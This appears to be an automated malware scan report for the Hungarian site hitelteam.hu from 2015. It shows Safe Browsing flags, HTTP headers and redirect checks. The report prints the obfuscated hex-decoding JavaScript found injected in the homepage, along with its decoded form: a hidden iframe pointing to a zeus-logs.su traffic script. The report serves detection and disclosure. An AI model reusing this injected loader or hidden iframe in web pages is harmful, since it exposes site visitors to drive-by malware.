Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=hitelteam.hu
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://hitelteam.hu/ | 200 OK Content-Length: 2159 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function c123843225611n4a3ed410da844(n4a3ed410db1ec){ function n4a3ed410dbdca(){return 16;} return (parseInt(n4a3ed410db1ec,n4a3ed410dbdca()));}function n4a3ed410dd129(n4a3ed410dd90f){ var n4a3ed410def9c=2; var n4a3ed410ddff6='';n4a3ed410e04cc=String.fromCharCode;for(n4a3ed410de7d6=0;n4a3ed410de7d6<n4a3ed410dd90f.length;n4a3ed410de7d6+=n4a3ed410def9c){ n4a3ed410ddff6+=(n4a3ed410e04cc(c123843225611n4a3ed410da844(n4a3ed410dd90f.substr(n4a3ed410de7d6,n4a3ed410def9c))));}return n4a3ed410ddff6;} v Decoded script: <iframe name=c12 src='http://zeus-logs.su/traffic/go.php?sid=14&'+Math.round(Math.random()*38148)+'d1be' width=561 height=68 style='display: none'></iframe> Antivirus reports:
| ||
http://hitelteam.hu/test404page.js | HTTP/1.1 302 Found Connection: close Date: Sat, 28 Feb 2015 18:55:14 GMT Location: http://hitelteam.hu/404/404.html Server: Apache/2.2 Content-Length: 216 Content-Type: text/html; charset=iso-8859-1 | clean |
http://hitelteam.hu/404/404.html | 200 OK Content-Length: 4306 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: hitelteam.hu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Feb 2015 18:55:13 GMT
Server: Apache/2.2
Content-Length: 2159
Content-Type: text/html
X-Powered-By: PHP/4.4.7
...2159 bytes of data.
GET / HTTP/1.1
Host: hitelteam.hu
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 28 Feb 2015 18:55:13 GMT
Server: Apache/2.2
Content-Length: 2159
Content-Type: text/html
X-Powered-By: PHP/4.4.7
...2159 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: hitelteam.hu
Referer: http://www.google.com/search?q=hitelteam.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: hitelteam.hu
Referer: http://www.google.com/search?q=hitelteam.hu
Result:
The result is similar to the first query. There are no suspicious redirects found.